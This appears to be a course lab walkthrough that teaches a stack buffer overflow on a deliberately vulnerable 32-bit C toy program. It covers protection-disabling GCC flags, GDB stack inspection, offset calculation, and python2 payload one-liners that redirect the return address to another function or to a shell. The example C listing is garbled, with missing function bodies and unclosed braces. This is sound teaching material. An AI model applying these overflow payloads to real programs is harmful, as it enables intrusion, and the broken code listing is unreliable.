Stack smashing

We're going to walk through the example from class, carrying out a simple stack buffer overflow attack.

To get started, create a file called example2.c with the example code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void bar() {

void foo() {
  printf("hello all!!\n");

void func(int a, int b, char *str) {
  int c = 0xdeadbeef;
  char buf[4];

int main(int argc, char**argv) {
  return 0;

Then compile the program with GCC:

gcc -m32 -O0 -ggdb -static -U_FORTIFY_SOURCE -fno-stack-protector -zexecstack -no-pie -o example2 example2.c

You'll note that we compiled this program with a bunch of flags. These flags disable many protection mechanism that would make such an attack harder to carry out. We'll see in class what most of these are.

Code and environment inspection

Our first goal is to manually modify the stack frames to change the return address in fun to jump (when it returns) to the beginning of foo, instead of returning back to main.

To get started, let's start GDB:

$ gdb example2

Within GDB let's set a breakpoint on func and run the program with argument "AAAA":

> b func
> set args "AAAA"
> r

To figure out where to jump to, let's first look at the what's on the stack frame:

Recall that the first argument is off by 8:

> x $ebp+8
0xffffced0:     0xaaaaaaaa

The second argument is at offset 12:

> x $ebp+12
0xffffced4:     0xbbbbbbbb

The old $ebp is at offset 0:

> x $ebp
0xffffcec8:     0xffffcee8

If our function returns normally, the $ebp will be set to 0xffffcee8. If you want to see this, set a breakpoint right after the strcpy (b 17), continue (c in GDB) and then step through (s). You can also stop at the exact leave instruction by setting a break point at the address:

> b *0x8049c1e

You can find such addresses with disas:

> disas func
Dump of assembler code for function func:
   0x08049bee <+0>:     push   %ebp
   0x08049bef <+1>:     mov    %esp,%ebp
   0x08049bf1 <+3>:     push   %ebx
   0x08049bf2 <+4>:     sub    $0x14,%esp
   0x08049bf5 <+7>:     call   0x8049c68 <>
   0x08049bfa <+12>:    add    $0x96406,%eax
   0x08049bff <+17>:    movl   $0xdeadbeef,-0xc(%ebp)
   0x08049c06 <+24>:    sub    $0x8,%esp
   0x08049c09 <+27>:    pushl  0x10(%ebp)
   0x08049c0c <+30>:    lea    -0x10(%ebp),%edx
   0x08049c0f <+33>:    push   %edx
   0x08049c10 <+34>:    mov    %eax,%ebx
   0x08049c12 <+36>:    call   0x8049028
   0x08049c17 <+41>:    add    $0x10,%esp
   0x08049c1a <+44>:    nop
   0x08049c1b <+45>:    mov    -0x4(%ebp),%ebx
   0x08049c1e <+48>:    leave
   0x08049c1f <+49>:    ret
End of assembler dump.

NOTE: This address will likely be different on your machine.

Where is the return address? It's 4 off the $ebp:

> x $ebp+4
0xffffcecc:     0x08049c58

Now what is this 0x08049c58 value? It's the address in main right after the call to func ( which is at address 0x8039bee):

> disas main
Dump of assembler code for function main:
   0x08049c20 <+0>:     lea    0x4(%esp),%ecx
   0x08049c53 <+51>:    call   0x8049bee <func>
   0x08049c58 <+56>:    add    $0x10,%esp
End of assembler dump.

Great. Now to to direct the control flow to foo instead of back to main we just need to overwrite the return address. We can do this by setting $ebp+4:

We can do this by getting foo's address:

>  p &foo
$2 = (void (*)()) 0x8049bc0 <foo>
> set {int}($ebp+4)=0x8049bc0

Or more simply:

> set {int}($ebp+4)=&foo

Now if you continue (c) the ret will jump to 0x8049bc0 and print:

hello all!!

As an attacker, we need to overflow the buffer to write the return address though. We can't attach GDB to a process we don't control.

Overflowing the buffer

So, let's overflow the buffer. To see the effects of the overflow make sure you set the breakpoint after strcpy and let's change the args to go just past buf 4-byte boundary:

> b 17
> set args
> set args "AAAABC"
> r

If you print the local variable c before and after the strcpy you'll see that we've overflow from buf into c:

> p c
$14 = 0xdeadbeef
> c
> p c
$15 = 0xde004342

You'll notice that c changed from 0xdeadbeef to 0xde004242, i.e., 0xde"\0CB". If we then change the args to "AAAABCD" you'll see that c = 0x00444342.

But we need to overflow the return address. How do we figure out how much we need to overflow? Compute the distance between the return address and buffer start. In func:

> p $ebp+4-&buf[0]
$16 = 0x14

This means that we need to supply an arugment that is 20 bytes long (0x14) to get up to the return address. Let's do that:

> r

Now if you inspect the contents of the return addresss (after strcpy) you'll see it filled with all Fs:

> x $ebp+4
0xffffcebc:     0x46464646

If you let this program continue it will crash with:

Cannot access memory at address 0x46464646

Why? We'll we're trying to read the instruction at address 0x46464646 to execute it. That's not a valid address. Let's instead point the program to foo (0x8049bc0):

> set args $(python2 -c "print 'AAAABBBBCCCCDDDDEEEE\xc0\x9b\x04\x08'")
> r

Now if you run the program it will print hello all.

We can do all of this from the shell:

$ ./example2 `python2 -c "print 'AAAABBBBCCCCDDDDEEEE\xc0\x9b\x04\x08'"`
hello all!!

In practice you'll want to get a shell. In our example we can get a shell by setting the return address to bar:

> p &bar
$35 = (void (*)()) 0x8049b95 <bar>
> set args $(python2 -c "print 'AAAABBBBCCCCDDDDEEEE\x95\x9b\x04\x08'")
> r

Realistically you won't have a nice function like bar in the process and you'll need to essentially mock a call to system yourself. You can do this by overflowing the buffer with your (shell) code and have the return address point to your code instead of existing functions. You'll get to do this in one of you assignments!


You may find GEF helpful throught the quarter. I like ATT synax for x86: set disassembly-flavor att and like the stack growing downwards to match slides (gef config context.grow_stack_down True).